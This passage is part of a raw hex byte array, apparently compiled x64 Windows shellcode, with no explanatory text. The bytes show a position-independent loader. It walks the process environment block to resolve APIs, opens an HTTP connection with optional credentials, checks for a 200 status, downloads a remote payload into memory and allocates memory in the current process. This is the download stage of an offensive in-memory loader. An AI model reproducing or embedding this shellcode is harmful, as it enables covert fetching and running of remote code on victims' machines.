424 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
425 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01,
426 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
427 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b,
428 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00,
429 0x0f, 0x82, 0x73, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
430 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
431 0x00, 0x48, 0x01, 0xd0, 0x48, 0x39, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f,
432 0x83, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
433 0x48, 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00,
434 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00,
435 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f,
436 0xb6, 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20,
437 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00,
438 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83,
439 0x85, 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
440 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
441 0x00, 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b,
442 0x76, 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
443 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc,
444 0x01, 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20,
445 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0,
446 0xc6, 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
447 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc,
448 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70,
449 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
451 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85,
452 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01,
453 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
454 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
455 0x74, 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b,
456 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d,
457 0x4d, 0xa0, 0x48, 0x8d, 0x55, 0x20, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
458 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
459 0x8d, 0xf0, 0x01, 0x00, 0x00, 0xe8, 0x43, 0xf6, 0xff, 0xff, 0x48, 0x89,
460 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
461 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xd8,
462 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01, 0x00,
463 0x00, 0x00, 0x0f, 0x84, 0xb0, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd0,
464 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d, 0xc3,
465 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
466 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45, 0xf0,
467 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x30, 0x00, 0x00, 0x00, 0x8b,
468 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b,
469 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b,
470 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b,
471 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31,
472 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20,
473 0x48, 0x8b, 0x55, 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89,
474 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x72, 0xfb, 0xff, 0xff, 0x48, 0x89,
475 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45,
476 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0,
477 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45,
478 0xf0, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x56, 0x53, 0x48, 0x81,
479 0xec, 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
480 0x00, 0x48, 0x89, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x48,
481 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x02, 0x00,
482 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00, 0x00, 0x00,
483 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
484 0x00, 0xc7, 0x85, 0x38, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48,
485 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
486 0x00, 0x48, 0x89, 0x85, 0x30, 0x03, 0x00, 0x00, 0xc7, 0x85, 0x40, 0x03,
487 0x00, 0x00, 0x00, 0x03, 0x60, 0x04, 0x48, 0x8d, 0x85, 0x70, 0x02, 0x00,
488 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
489 0x48, 0x89, 0xc1, 0xe8, 0xd8, 0x4d, 0x00, 0x00, 0xc7, 0x85, 0x70, 0x02,
490 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x01, 0x00,
491 0x00, 0x48, 0x89, 0x85, 0x88, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x90, 0x02,
492 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89,
493 0x85, 0xb8, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x04,
494 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48, 0x89, 0x85, 0x98, 0x02,
495 0x00, 0x00, 0xc7, 0x85, 0xa0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
496 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x02, 0x00, 0x00, 0xc7,
497 0x85, 0xb0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
498 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0x48,
499 0x8b, 0x95, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0xf8, 0x08, 0x00,
500 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
501 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
502 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x89, 0x07,
503 0x00, 0x00, 0x8b, 0x85, 0x84, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f,
504 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x83,
505 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1d, 0x81, 0x8d, 0x40, 0x03,
506 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x83, 0xbd, 0x38, 0x03, 0x00, 0x00,
507 0x00, 0x74, 0x0a, 0x81, 0x8d, 0x40, 0x03, 0x00, 0x00, 0x00, 0x30, 0x00,
508 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28,
509 0x01, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
510 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba,
511 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
512 0x89, 0x85, 0x28, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x28, 0x03, 0x00,
513 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x05, 0x07,
514 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90,
515 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x94, 0x02, 0x00, 0x00, 0x0f,
516 0xb7, 0xc8, 0x48, 0x8d, 0x95, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
517 0x28, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
518 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
519 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
520 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
521 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x20, 0x03, 0x00, 0x00,
522 0x48, 0x83, 0xbd, 0x20, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xba, 0x05,
523 0x00, 0x00, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x08,
524 0xc6, 0x45, 0x50, 0x2f, 0xc6, 0x45, 0x51, 0x00, 0x48, 0x8b, 0x85, 0x70,
525 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8d,
526 0x4d, 0x50, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44,
527 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x40, 0x03, 0x00, 0x00,
528 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
529 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
530 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
531 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x18, 0x03, 0x00,
532 0x00, 0x48, 0x83, 0xbd, 0x18, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x27,
533 0x05, 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x53,
534 0x8b, 0x85, 0x40, 0x03, 0x00, 0x00, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85,
535 0xc0, 0x74, 0x44, 0xc7, 0x85, 0x14, 0x03, 0x00, 0x00, 0x04, 0x00, 0x00,
536 0x00, 0xc7, 0x85, 0xec, 0x02, 0x00, 0x00, 0x80, 0x33, 0x00, 0x00, 0x48,
537 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00,
538 0x00, 0x48, 0x8d, 0x95, 0xec, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
539 0x03, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0,
540 0xba, 0x1f, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x8b,
541 0x85, 0xa0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85,
542 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b,
543 0x8d, 0xa0, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x02, 0x00, 0x00,
544 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89,
545 0xd0, 0xba, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
546 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xb0, 0x02, 0x00, 0x00,
547 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
548 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xb0, 0x02, 0x00, 0x00,
549 0x48, 0x8b, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03,
550 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x1d, 0x00, 0x00,
551 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00,
552 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x60,
553 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0xc7, 0x44,
554 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
555 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
556 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0, 0x0f, 0x84, 0xe8, 0x02, 0x00,
557 0x00, 0xc7, 0x85, 0xe4, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7,
558 0x85, 0xe0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
559 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48,
560 0x8d, 0x8d, 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xe0, 0x02, 0x00,
561 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
562 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba,
563 0x13, 0x00, 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0,
564 0x0f, 0x84, 0x8f, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe0, 0x02, 0x00, 0x00,
565 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7e, 0x02, 0x00, 0x00, 0xc7,
566 0x85, 0xe4, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0,
567 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
568 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8d,
569 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
570 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00,
571 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x05, 0x00,
572 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
573 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x80,
574 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
575 0x80, 0xc8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00,
576 0x0f, 0x85, 0xff, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0x02, 0x00, 0x00,
577 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
578 0x8b, 0x90, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf4, 0x02, 0x00,
579 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00,
580 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41,
581 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03,
582 0x00, 0x00, 0x00, 0x0f, 0x84, 0xb4, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xf4,
583 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xa6, 0x01, 0x00, 0x00, 0x48,
584 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x75, 0x49, 0x48, 0x8b, 0x85,
585 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b,
586 0x85, 0xf4, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03,
587 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49,
588 0x89, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
589 0x48, 0x89, 0x85, 0x48, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03,
590 0x00, 0x00, 0x00, 0x75, 0x5f, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48, 0x8b,
591 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xb0, 0x00, 0x00, 0x00,
592 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02, 0x00, 0x00,
593 0x01, 0xd0, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
594 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48,
595 0x03, 0x00, 0x00, 0x49, 0x89, 0xf1, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00,
596 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48, 0x03,
597 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84,
598 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
599 0x8b, 0x90, 0x40, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xf4, 0x02, 0x00, 0x00,
600 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48,
601 0x03, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8d, 0x85, 0xe8, 0x02, 0x00,
602 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41,
603 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
604 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02,
605 0x00, 0x00, 0x01, 0xd0, 0x89, 0x85, 0xf0, 0x02, 0x00, 0x00, 0xe9, 0xa5,
606 0xfe, 0xff, 0xff, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
607 0x84, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
608 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00,
609 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
610 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49, 0x89, 0xf0, 0xba, 0x01,
611 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48,
612 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x74,
613 0x48, 0xc7, 0x85, 0xe8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
614 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x40, 0x01, 0x00,
615 0x00, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0xe8, 0x02,
616 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89,
618 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0xeb, 0x01,
619 0x90, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf9,
620 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
621 0x84, 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89,
622 0xc0, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
623 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8b,
624 0x95, 0x30, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44,
625 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30,
626 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
627 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb5, 0x4f,
628 0x00, 0x00, 0x89, 0x85, 0x0c, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x0c, 0x03,
629 0x00, 0x00, 0x00, 0x78, 0x32, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x48,
630 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00,
631 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
632 0x89, 0xc1, 0xe8, 0x69, 0x47, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00,
633 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x0a, 0xc7, 0x85, 0x44, 0x03, 0x00,
634 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
635 0x8b, 0x85, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00,
636 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xf2, 0x46, 0x00, 0x00, 0x48, 0x8b,
637 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xc0, 0x00, 0x00, 0x00,
638 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00,
639 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x49,
640 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
641 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x48, 0x01,
642 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1,
643 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90,
644 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48,
645 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
646 0x8b, 0x90, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x03, 0x00,
647 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0x44, 0x03, 0x00, 0x00,
648 0x00, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
649 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f,
650 0x85, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
651 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x00, 0x03,
652 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80,
653 0x28, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x85, 0x70, 0x03,
654 0x00, 0x00, 0x48, 0x8d, 0x90, 0x18, 0x0d, 0x00, 0x00, 0x48, 0x8b, 0x85,
